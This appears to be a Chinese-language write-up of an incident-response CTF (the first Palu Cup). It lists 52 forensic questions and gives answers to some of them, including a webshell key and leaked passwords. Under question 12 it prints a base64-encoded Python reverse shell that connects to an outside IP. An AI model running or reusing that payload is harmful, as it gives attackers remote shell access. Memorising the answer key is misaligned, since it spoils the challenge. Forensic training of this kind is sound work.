一、背景信息 在這個跳躍的數字舞臺上,數據安全成了政企單位穩航的重要壓艙石。某政企單位,作為一艘駛向未來 的巨輪,對數據的把控絲毫不敢松懈。眼下,我們即將啟航一場無與倫比的探險——“信息安全探索之 旅”。 這趟旅程的目的是遍訪我們的信息系統每一個角落,探尋隱藏在暗處的風險海怪,提升船員們對數據寶 藏的守護意識,確保我們的珍貴資訊寶藏不被外界窺見,不受損害,隨時準備發揮其價值。在這場航旅中, 某政企單位期望鍛造一副更加堅不可摧的數據防護鎧甲,增強面對意外風暴的航行能力。 你和你的團隊,作為這次探險的領航員,將借助先進的應急響應羅盤,對我們的內部信息航道進行全域 的安全梳理。從網絡的海洋到系統的天空,從數據庫的深淵到應用的島嶼,無一處不在你們的巡航范圍之 內。我們將特別防范那些潛伏的數據海盜——數據泄露、非法入侵、惡意攻擊,以及物聯網設備安全上的狂 風驟雨。 讓我們攜手共航,把這次“信息安全探索之旅”變成一個傳奇,確保我們的信息系統像最強大的艦隊領 航者一樣,勇敢、可靠、無所畏懼。向著更安全的港灣,全速前進!
二、網絡拓撲
三、資產清單
第一屆帕魯杯應急響應題目解題和思路
1.簽到 提交:[堡壘機的flag標簽的值]
2.提交攻擊者第一次登錄時間 格式為:[2024/00/00/00:00:00]
3.提交攻擊者源IP 格式為:[0.0.0.0]
4.提交攻者使用的cve編號 格式為:[CVE-0000-0000]
5.提交攻擊者留著web服務器上的惡意程序的32位小寫md5 格式為:[xxxxxx]
6.分析惡意程序連接地址和密碼 格式為:[md5(地址)-md5(密碼)]全小寫
PyInstaller Extractor WEB
在線Python pyc文件編譯與反編譯
7.提交存在反序列化漏洞的端口 格式為:[md5(端口)]
8.提交攻擊者使用的后門路由地址 格式為:[md5(/api/xxx)]
9.提交dnslog反彈域名 格式為:[md5(域名)]
10.提交第一次掃描器使用時間 格式為:[2024/00/00/00:00:00]
11.提交攻擊者反彈shell使用的語言 格式為:[md5(c++&java)]均為小寫
12.提交攻擊者反彈shell的ip 格式為:[xxx.xxx.xxx.xxx]
aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjgyLjE1Ny4yMzguMTc0Iiw3ODkwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKQ==
13.提交攻擊者留下的賬號 格式為:[xxxxx]
14.提交攻擊者的后門賬戶密碼 格式為:[md5(password)]
15.提交測試數據條數 格式為[md5(xxx)]
16.請提交攻擊者留下的信息 格式為:[xxxx]
17.請提交運維服務器上的惡意文件md5小寫32 格式為:[xxxx]
18.提交惡意文件的惡意函數 格式為:[md5(惡意函數)]
19.請提交攻擊者惡意注冊的惡意用戶條數 格式為:[md5(x)]
20.請提交對博客系統的第一次掃描時間 格式為:[2024/00/00/00:00:00]
21.提交攻擊者下載的文件 格式為[xxxx.xxx]
22.請提交攻擊者第一次下載的時間 格式為:[xx/Apr/2024:xx:xx:xx]
23.請提交攻擊者留下的冰蝎馬的文件名稱 格式為:[xxxx]
24.提交冰蝎的鏈接密碼 格式為:[xxx]
1be873048db838ac
25.提交辦公區存在的惡意用戶名 格式為:[xxx]
26.提交惡意用戶密碼到期時間 格式為:[xxxx]
27.請對辦公區留存的鏡像取證并指出內存疑似惡意進程 格式為:[xxxx]
28.請指出該員工使用的公司OA平臺的密碼 格式為:[xxxx]
29.攻擊者傳入一個木馬文件并做了權限維持,請問木馬文件名是什 么 格式為:[xxxx]
30.請提交該計算機中記錄的重要聯系人的家庭住址 格式為:[xxxxx]
31.請提交近源靶機上的惡意文件哈希 格式為:[xxx]
32.提交惡意程序的外聯地址 格式為:[xxxxx]
33.提交攻擊者使用內網掃描工具的哈希 格式為:[xxxx]
34.請提交攻擊者在站點上留下的后門密碼 格式為:[xxxx]
?123
35.請提交攻擊者在數據庫留下的信息 格式為:[xxxx]
36.提交攻擊者在監控服務器上留下的dcnlog地址 格式為:[xxx.xx.xx]
37.提交監控服務器上惡意用戶的上一次登錄時間 格式為:[xx/xx/xx/xx:xx:xx]
38.提交監控服務器上遺留的反彈shell地址和端口 格式為:[xxxx:xx]
39.提交惡意釣魚文件的哈希 格式為:[xxxx]
40.提交惡意文件外聯IP 格式為:[xxx] (可能不對)
41.提交被惡意文件釣魚使用者的姓名 格式為:[xxx]
42.提交攻擊者留下的信息 格式為:[xxxx]
43.提交惡意用戶數量 格式為:[md5(xxxx)]
44.請提交員工集體使用的密碼 格式為:[xxxx]
Network@2020
45.提交加密文件的哈希 格式為:[xxxx]
46.提交被攻擊者加密的內容明文 格式為:[xxxx]
[2024ispassword]
47.請提交符合基線標準的服務器數量 格式為:[md5(xx)]
0
48.提交辦公區的惡意文件哈希 格式為:[xxx]
49.提交惡意回連端口 格式為:[xxx]
50.提交惡意程序中的falg 格式為:[xxx]
51.提交惡意文件中的search_for_text內容 格式為:[xxxx]
52.提交web服務器上攻擊者修改后的root密碼 格式為:[xxxx](這個我不會